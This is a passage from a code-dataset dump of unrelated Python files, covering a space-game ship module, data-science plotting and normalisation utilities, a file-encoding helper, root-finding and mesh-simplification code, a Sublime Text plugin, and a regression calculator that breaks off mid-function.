S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker1 = effects.FlickerCircle(view, self.enginePoint1, 2.5, 0.25, misc.WHITE)\n self.engineFlicker2 = effects.FlickerCircle(view, self.enginePoint2, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker1)\n view.lowEffects.append(self.engineFlicker2)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n # HOLY COW!\n # starboard side\n # point 0: 0, 0 for this ship. Pointy.\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n # point 1: 2.28 & 9.75 15 - 9.75 = 5.25\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n # point 2: 2.67 @ 46 ... = 3.5\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 2.67 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 2.67 * math.pi / 3))),\\\n # Starboard side engine.\n # point 3: 2.6 & 17.5 ... 15 - 4.375 = 10.625 !!! minus four'd!\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n # point 4: 2.79 ~ 2.8 & 14.0 ... 15 - 3.5 = 11.5 !!! minus four'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n # begin tail assembly.\n # point 5: 2.87 & 49.5 ... 
15 - 12.375 = 2.625\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 2.87 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 2.87 * math.pi / 3))),\\\n # tail point.\n # point 6: 3 & radius.\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n # final tail point.\n # point 7 equiv 5.\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 3.13 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 3.13 * math.pi / 3))),\\\n # Portside engine.\n # point 8 equiv 4. !!! minus 4'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n # point 9 equiv 3. !!! minus 4'd\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # Port side.\n # point 10 equiv 2.\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 3.33 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 3.33 * math.pi / 3))),\\\n # point 11 equiv 1.\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius+2) * math.sin(self.rotation), (self.y - (self.radius+2) * math.cos(self.rotation)), self.rotation)]\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 2.3 * math.pi / 3)), self.rotation + 2.3))\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 3.7 * math.pi / 3)), self.rotation + 3.7))\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint1 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 2.7 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 2.7 * math.pi / 3)))\n self.enginePoint2 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 3.3 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 3.3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker1.xy = self.enginePoint1\n self.engineFlicker2.xy = self.enginePoint2\n self.engineFlicker1.visible = True\n self.engineFlicker2.visible = True\n else:\n self.engineFlicker1.visible = False\n self.engineFlicker2.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. 
Dunno if we want need these but hum.\n self.engineFlicker1.die()\n self.engineFlicker2.die()\n\n\nclass S1s6(Ship):\n \"\"\" Carrier \"\"\"\n intEnginePoint = [0, 0]\n buildPoints = [(0,0),(0,0)]\n buildQueue = []\n building = False\n buildTimeRemaining = 0\n buildShip = Ship\n\n health = 40\n\n radius = 25\n\n rotateSpeed = 0.004\n speed = 0.1\n\n #buildInfo\n buildCost = 10\n buildTime = 1000\n \n availableToBuild = [S1s1]\n \n def calcPoints(self):\n self.points = [(self.x + self.radius * math.sin(self.rotation + 5.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 5.8 * math.pi /3))),\\\n (self.x + self.radius * math.sin(self.rotation + 0.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 0.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4 * math.pi / 3)))]\n self.needsToCalcPoints = False\n\n def calcExtras(self):\n self.buildPoints[0] = (self.x + (self.radius + 10) * math.sin(self.rotation)), (self.y - (self.radius + 10) * math.cos(self.rotation))\n\n def poll(self):\n #standard poll functions\n self.orders[0].poll()\n self.calcExtras()\n if self.building == False and len(self.buildQueue) > 0:\n self.buildShip = self.buildQueue.pop(0)\n self.buildShip.orders = [orders.Idle(self)]\n self.buildShip.rotation = self.rotation\n self.player.resources -= self.buildShip.buildCost\n self.buildTimeRemaining = self.buildShip.buildTime\n self.player.ships.append(self.buildShip) # Add to list of ships.\n# print ships\n self.building = True\n elif self.building == True:\n# print self.buildTimeRemaining\n self.buildTimeRemaining -= 1\n self.buildShip.x = self.buildPoints[0][0]\n# print self.buildShip.x\n self.buildShip.y = self.buildPoints[0][1]\n #self.buildShip.rotation = self.rotation\n self.buildShip.rotation = misc.normalisedAngle(0.02 + self.buildShip.rotation)\n self.buildShip.calcPoints()\n self.buildShip.colour = ((self.player.colour[0] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[1] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[2] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime))\n #print self.buildShip.colour\n\n if self.buildTimeRemaining == 1:\n #self.buildShip.setOrder(orders.MoveToXY(10,10))\n self.buildShip.justBuilt()\n self.building = False \n\n def addToBuildQueue(self, ship): #Currently only produces triangles. only works on buildships.\n self.buildQueue.append(ship(self.view, self.player, self.buildPoints[0][0], self.buildPoints[0][1])) # Pete, you forgot the self. 
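# --- editor's sketch, not part of the original ships.py --------------------
# The build-queue colour fade in poll() scales each channel by the fraction
# of build time elapsed; factored out, the interpolation is simply:
def fade_colour(colour, elapsed, total):
    # elapsed in [0, total]; black at 0, the player's full colour at total.
    t = max(0, min(elapsed, total)) / float(total)
    return tuple(int(c * t) for c in colour)
# ---------------------------------------------------------------------------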
prefix\n","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":22205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585835301","text":"def turkish_chars_to_ascii_chars(turkish_string):\n turkish_chars = ['ç', 'ğ', 'ı', 'ö', 'ş', 'ü']\n latin_chars = ['c', 'g', 'i', 'o', 's', 'u']\n\n cleared_str = ''\n for s in turkish_string:\n try:\n index_of_ascii_char = turkish_chars.index(s)\n cleared_str += latin_chars[index_of_ascii_char]\n except ValueError:\n # means that: it is not a special Turkish char\n cleared_str += s\n return cleared_str\n","sub_path":"horsing_around/tests/string_util.py","file_name":"string_util.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"291096265","text":"\"\"\"\nThis modules contains utility functions for data manipulation and plotting of\nresults and data\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\nimport torch\n\n\n#######################################################\n# Data Utilities \n#######################################################\n\ndef load_trained_model(previous_model, model, optimizer):\n \n checkpoint = torch.load(previous_model)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n model.eval()\n \n return model, optimizer\n\n\ndef save_trained_model(save_path, epoch, model, optimizer, train_loss, test_loss):\n save_dict = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n# 'train_losses': train_loss\n# 'test_losses': [pce_test_loss, voc_test_loss,\n# jsc_test_loss, ff_test_loss]\n 'optimizer': optimizer.state_dict()\n }\n \n torch.save(save_dict, save_path)\n return\n\n\ndef df_MinMax_normalize(dataframe):\n \n df = dataframe\n \n normed_df = pd.DataFrame()\n\n df_norm_key = {}\n\n for colname, coldata in df.iteritems():\n max_val = coldata.max()\n min_val = coldata.min()\n\n df_norm_key[colname] = [min_val, max_val]\n\n normed_col = (coldata - min_val) / (max_val - min_val)\n normed_df[colname] = normed_col\n \n return normed_df, df_norm_key \n\n\ndef df_MinMax_denormalize(normed_df, norm_key):\n \n denormed_df = pd.DataFrame()\n \n for colname, coldata in normed_df.iteritems():\n mn = norm_key[colname][0]\n mx = norm_key[colname][1]\n \n denormed_col = (coldata * (mx - mn)) + mn\n \n denormed_df[colname] = denormed_col\n \n return denormed_df\n\n\ndef df_Gaussian_normalize(dataframe):\n \n df = dataframe\n normed_df = pd.DataFrame()\n norm_key = {}\n \n for colname, coldata in df.iteritems():\n stdev = coldata.std()\n mean = coldata.mean()\n \n normed_col = (coldata - mean) / stdev\n normed_df[colname] = normed_col\n \n norm_key[colname] = [mean, stdev]\n \n return normed_df, norm_key\n\n\n#######################################################\n# Network Model Utilities\n#######################################################\n\ndef init_weights(model):\n if type(model) == torch.nn.Linear:\n torch.nn.init.xavier_uniform_(model.weight)\n model.bias.data.fill_(0.01)\n \n# if type(model) == nn.BatchNorm1d:\n# model.reset_parameters()\n\n \n\n#######################################################\n# Plotting Utilities\n#######################################################\n\ndef plot_OPV_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n pce_train_epoch_losses, 
pce_test_epoch_losses,\n voc_train_epoch_losses, voc_test_epoch_losses,\n jsc_train_epoch_losses, jsc_test_epoch_losses,\n ff_train_epoch_losses, ff_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs, train_epoch_losses, c = 'k', label = 'training error')\n plt.plot(epochs, test_epoch_losses, c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], pce_train_epoch_losses[::], c = 'k', label = 'pce training')\n plt.plot(epochs[::], pce_test_epoch_losses[::], '-.', c = 'k', label = 'pce testing')\n\n plt.plot(epochs[::], voc_train_epoch_losses[::], c = 'r', label = 'voc training')\n plt.plot(epochs[::], voc_test_epoch_losses[::], '-.', c = 'r', label = 'voc testing')\n\n plt.plot(epochs[::], jsc_train_epoch_losses[::], c = 'g', label = 'jsc training')\n plt.plot(epochs[::], jsc_test_epoch_losses[::], '-.', c = 'g', label = 'jsc testing') \n \n plt.plot(epochs[::], ff_train_epoch_losses[::], c = 'b', label = 'ff training') \n plt.plot(epochs[::], ff_test_epoch_losses[::], '-.', c = 'b', label = 'ff testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\ndef plot_OPV_df_accuracies(epochs, pce_test_epoch_accuracies, voc_test_epoch_accuracies, \n jsc_test_epoch_accuracies, ff_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, pce_test_epoch_accuracies, c = 'k', label = 'pce MAPE')\n plt.plot(epochs, voc_test_epoch_accuracies, c = 'r', label = 'voc MAPE')\n plt.plot(epochs, jsc_test_epoch_accuracies, c = 'g', label = 'jsc MAPE')\n plt.plot(epochs, ff_test_epoch_accuracies, c = 'b', label = 'ff MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\ndef plot_OPV_parity(pce_labels, PCE_out, voc_labels, Voc_out,\n jsc_labels, Jsc_out, ff_labels, FF_out):\n \n xlin = ylin = np.arange(-10, 10, 1)\n\n r2 = r2_score(pce_labels, PCE_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(PCE_out, pce_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_ylim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('PCE Parity')\n plt.show()\n\n r2 = r2_score(voc_labels, Voc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Voc_out, voc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_ylim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Voc Parity')\n plt.show()\n\n r2 = r2_score(jsc_labels, Jsc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Jsc_out, jsc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(jsc_labels.min(), Jsc_out.min()), 
max(jsc_labels.max(), Jsc_out.max()))\n ax.set_ylim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Jsc Parity')\n plt.show()\n\n r2 = r2_score(ff_labels, FF_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(FF_out, ff_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_ylim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('FF Parity')\n plt.show()\n \n \ndef plot_OFET_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n mu_train_epoch_losses, mu_test_epoch_losses,\n r_train_epoch_losses, r_test_epoch_losses,\n on_off_train_epoch_losses, on_off_test_epoch_losses,\n vt_train_epoch_losses, vt_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs[::], train_epoch_losses[::], c = 'k', label = 'training error')\n plt.plot(epochs[::], test_epoch_losses[::], c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], mu_train_epoch_losses[::], c = 'k', label = 'mu training')\n plt.plot(epochs[::], mu_test_epoch_losses[::], '-.', c = 'k', label = 'mu testing')\n\n plt.plot(epochs[::], r_train_epoch_losses[::], c = 'r', label = 'r training')\n plt.plot(epochs[::], r_test_epoch_losses[::], '-.', c = 'r', label = 'r testing')\n\n plt.plot(epochs[::], on_off_train_epoch_losses[::], c = 'g', label = 'on_off training')\n plt.plot(epochs[::], on_off_test_epoch_losses[::], '-.', c = 'g', label = 'on_off testing') \n \n plt.plot(epochs[::], vt_train_epoch_losses[::], c = 'b', label = 'vt training') \n plt.plot(epochs[::], vt_test_epoch_losses[::], '-.', c = 'b', label = 'vt testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\n\ndef plot_OFET_df_accuracies(epochs, mu_test_epoch_accuracies, r_test_epoch_accuracies, \n on_off_test_epoch_accuracies, vt_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, mu_test_epoch_accuracies, c = 'k', label = 'mu MAPE')\n plt.plot(epochs, r_test_epoch_accuracies, c = 'r', label = 'r MAPE')\n plt.plot(epochs, on_off_test_epoch_accuracies, c = 'g', label = 'on_off MAPE')\n plt.plot(epochs, vt_test_epoch_accuracies, c = 'b', label = 'vt MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\n\ndef plot_OFET_parity(mu_labels, mu_out, r_labels, r_out,\n on_off_labels, on_off_out, vt_labels, vt_out):\n \n xlin = ylin = np.arange(-20, 20, 1)\n\n r2 = r2_score(mu_labels, mu_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(mu_labels, mu_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('mu Parity')\n plt.show()\n\n r2 = r2_score(r_labels, r_out)\n fig, ax = 
plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(r_labels, r_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('r Parity')\n plt.show()\n\n r2 = r2_score(on_off_labels, on_off_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(on_off_labels, on_off_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('on_off Parity')\n plt.show()\n\n r2 = r2_score(vt_labels, vt_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(vt_labels, vt_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('Vt Parity')\n plt.show()","sub_path":"m2py/networks/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57935349","text":"\"\"\"\n自定义的open, 用于不同之间的编码\n\"\"\"\n\n# 支持的编码类型\nCodings = {\"utf8\", \"gbk\"}\n\n# 文件操作符类型\nfs_oprate = {\"w\", \"r\"}\n\n\nclass OprationError(Exception):\n def __str__(self):\n return \"文件操作符类型不正确!,仅支持{}\".format(\"和\".join(fs_oprate))\n\n\nclass CustomOpen:\n \"\"\"\n 重写open\n \"\"\"\n def __init__(self, file, rwmode=\"\"):\n self.rwmode = rwmode\n self.file = file\n self._f = \"\"\n self.data = \"\"\n self.__initread()\n\n def __initread(self):\n if not self.rwmode:\n for code in Codings:\n try:\n self._f = open(self.file, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n else:\n if self.rwmode == \"r\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n if self.rwmode == \"w\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n break\n except UnicodeDecodeError:\n continue\n\n def read(self):\n return self.data\n\n def write(self, content):\n self._f.write(content)\n\n def close(self):\n self._f.close()\n\n def __setattr__(self, key, value):\n if key == \"rwmode\":\n if value not in {\"r\", \"w\", \"\"}:\n raise OprationError\n super().__setattr__(key, value)\n\n\nif __name__ == \"__main__\":\n f = CustomOpen(r\"/home/tangxinwu/Desktop/workspace/Android/gradle.properties\")\n print(f.read())\n","sub_path":"infrastructure/plugin/CustomOpen.py","file_name":"CustomOpen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476675251","text":"''' This script produces a scatter plot of the Hourly Wind Speed (HOURLYWindSpeed) vs Hourly Station Pressure (HOURLYStationPressure).\nAny wind speeds over 70% of max wind should be colored red. 
'''\n\n'''Data downloaded from National Center for Environmental Information (NCEI)'''\n\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n##Read the csv file\ndata = 'NCEIdata.csv'\n\n\"\"\"Making a 2d numpy array from data where only the wind and pressure columns are taken.\nRows with missing values are masked and then dropped\"\"\"\ndata1 = np.genfromtxt(data, delimiter=',', dtype = float, skip_header=1, usecols=(17,20))\ndata1 = np.ma.masked_where(np.isnan(data1), data1)\ndata1 = np.ma.compress_rows(data1)\n\n\n#Defining wind and pressure arrays through indexing\nwind = (data1[:,0])\npressure = (data1[:,1])\n\n#Finding the 70%-of-highest-wind threshold\nhighwind = (np.amax(wind))*0.7\n\n#Making an array where winds below the threshold are masked\nstrongwind = np.ma.masked_where(wind < highwind, wind)\n\n\n#Making the plot \nplt.scatter(wind,pressure, label = \"Wind vs. Pressure\", s = 4)\nplt.scatter(strongwind,pressure, c = 'r', s = 4, label = \"Strongest Wind vs. Pressure\")\nplt.title(\"Wind Speed vs. Pressure\")\nplt.xlabel(\"Wind Speed (mph)\")\nplt.ylabel(\"Pressure (in)\")\nplt.legend(loc='best')\nplt.show()\n\n\n\n\n","sub_path":"NCEI_Conditions.py","file_name":"NCEI_Conditions.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"50080683","text":"class RootFindingClass:\n    def __init__(self, minv, maxv, N, method, f, fp, tol):\n        import numpy as np\n        self.minv = float(minv)\n        self.maxv = float(maxv)\n        self.N = N\n        self.method = method\n        self.f = f\n        self.fp = fp\n        self.tol = tol\n\n    def Solve(self):\n\n        # Compare method names with '==', not 'is': identity of equal string\n        # literals is an implementation detail, not a language guarantee.\n        if self.method == 'Bisection':\n            from Bisection import Bisection\n            self.x_n = Bisection([self.minv, self.maxv], self.N, self.f)\n        elif self.method == 'RegulaFalsi':\n            from RegulaFalsi import RegulaFalsi\n            self.x_n = RegulaFalsi([self.minv, self.maxv], self.N, self.f)\n        elif self.method == 'Secant':\n            from Secant import Secant\n            self.x_n = Secant([self.minv, self.maxv], self.N, self.f)\n        elif self.method == 'NewtonRaphson':\n            from NewtonRaphson import NewtonRaphson\n            self.x_n = NewtonRaphson([self.minv, self.maxv], self.N, self.f, self.fp)\n        elif self.method == 'Brent':\n            from Brent import Brent\n            self.x_n = Brent([self.minv, self.maxv], self.N, self.f, self.tol)\n\n#def f (x): return x**3 - 27\n#def fp(x): return 3*x**2\n#\n#Eqn = RootFindingClass(1, 10, 10, 'Brent', f, fp, 1e-4)\n#Eqn.Solve()\n#\n#print Eqn.x_n\n","sub_path":"Root finding/RootFinding_class.py","file_name":"RootFinding_class.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"524228501","text":"import numpy as np\nimport open3d as o3d\n\n\ndef simplification(verts, faces, target_number_of_triangles, maximum_error=None, boundary_weight=1.0):\n    tri_mesh = o3d.geometry.TriangleMesh()\n    tri_mesh.vertices = o3d.utility.Vector3dVector(verts)\n    tri_mesh.triangles = o3d.utility.Vector3iVector(faces)\n    simplified_mesh = tri_mesh.simplify_quadric_decimation(\n        target_number_of_triangles)\n    return np.array(simplified_mesh.vertices), np.array(simplified_mesh.triangles)\n","sub_path":"mesh_process/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
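A short sketch (an editor's addition, not one of the dataset records): the if/elif chain in the RootFindingClass record a little above maps method names to callables, which a dict lookup expresses directly, with a clear error for unknown names. The solver names in the usage comment are the ones that record imports.

def pick_solver(method, solvers):
    # solvers: dict mapping a method name to its callable; unlike the
    # if/elif chain, an unknown name fails loudly instead of silently
    # leaving self.x_n unset.
    try:
        return solvers[method]
    except KeyError:
        raise ValueError('unknown root-finding method: %r' % method)

# usage sketch:
#   solver = pick_solver('Bisection', {'Bisection': Bisection, ...})
#   x_n = solver([minv, maxv], N, f)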
+{"seq_id":"364817264","text":"import sublime, sublime_plugin\n\n\nclass MultiSelectCommand(sublime_plugin.TextCommand):\n    '''\n    Place the cursor at the beginning of each selected line\n    '''\n    def run(self, edit):\n        v = self.view\n\n        # Get the selected regions\n        selected_regions = list(v.sel())\n\n        # Clear the text selections\n        v.sel().clear()\n\n        '''\n        Walk over all selected regions\n        and get the bounds of the selected lines\n        '''\n        for sel_region in selected_regions:\n            selected_lines = v.lines(sel_region)\n\n            # Walk over all selected lines\n            for (start, end) in selected_lines:\n                # Put the cursor at the beginning of the line\n                v.sel().add(sublime.Region(start))\n\n        sublime.status_message(\"success\")\n","sub_path":"multiselect.py","file_name":"multiselect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382549020","text":"# Andy Kotz final project: graphing calculator with regressions\n\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, TextAsset\nfrom ggame import CircleAsset, ImageAsset\nfrom math import sin, cos, radians\n\nSCREEN_WIDTH = 1900\nSCREEN_HEIGHT = 1000\n\ndef correlation(xlistpts,ylistpts):\n    N = len(xlistpts)\n    corgofor = 0\n    Exylist = []\n    while corgofor <= len(xlistpts)-1:\n        jum = xlistpts[corgofor]*ylistpts[corgofor]\n        Exylist.append(jum)\n        corgofor += 1\n    Exy = sum(Exylist)\n    Ex = sum(xlistpts)\n    Ey = sum(ylistpts)\n    Ex2list = []\n    Ey2list = []\n    for j in xlistpts:\n        jummy = j**2\n        Ex2list.append(jummy)\n    for i in ylistpts:\n        jumby = i**2\n        Ey2list.append(jumby)\n    Ex2 = sum(Ex2list)\n    Ey2 = sum(Ey2list)\n    numerator = (N*Exy)-(Ex*Ey)\n    denominator = (((N*Ex2)-(Ex)**2)*((N*Ey2)-(Ey)**2))**0.5\n    r = numerator/denominator\n    return (r)\ndef quadreg(xlistpts,ylistpts):\n    N = len(xlistpts)\n    Ex = sum(xlistpts)\n    Ey = sum(ylistpts)\n    Ex2list = []\n    Ex3list = []\n    Ex4list = []\n    for j in xlistpts:\n        jummy = j**2\n        Ex2list.append(jummy)\n    Ex2 = sum(Ex2list)\n    for j in xlistpts:\n        jummy = j**3\n        # bug fix: this loop appended to Ex2list, leaving Ex3list empty\n        Ex3list.append(jummy)\n    Ex3 = sum(Ex3list)\n    for j in xlistpts:\n        jummy = j**4\n        # bug fix: same problem for the fourth powers\n        Ex4list.append(jummy)\n    Ex4 = sum(Ex4list)\n    corgofor = 0\n    Exylist = []\n    Ex2ylist = []\n    while corgofor <= len(xlistpts)-1:\n        jum = 